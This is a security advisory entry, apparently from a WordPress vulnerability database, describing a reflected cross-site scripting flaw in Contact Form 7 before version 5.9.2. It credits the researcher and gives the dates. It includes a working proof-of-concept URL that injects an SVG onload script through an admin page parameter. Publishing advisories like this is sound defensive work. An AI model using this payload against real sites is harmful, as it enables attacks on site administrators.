WordPress Plugin Vulnerabilities
Contact Form 7 < 5.9.2 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against administrators.
Proof of Concept
http://vulnerable-site.tld/wp-admin/admin.php?page=wpcf7&post=$FORMID&active-tab=1%22%3E%3Csvg%2Fonload%3Dalert%281%29%2F%2F%3E
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Asaf Mozes
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-03-13 (about 3 months ago)
Added
2024-03-13 (about 3 months ago)
Last Updated
2024-03-13 (about 3 months ago)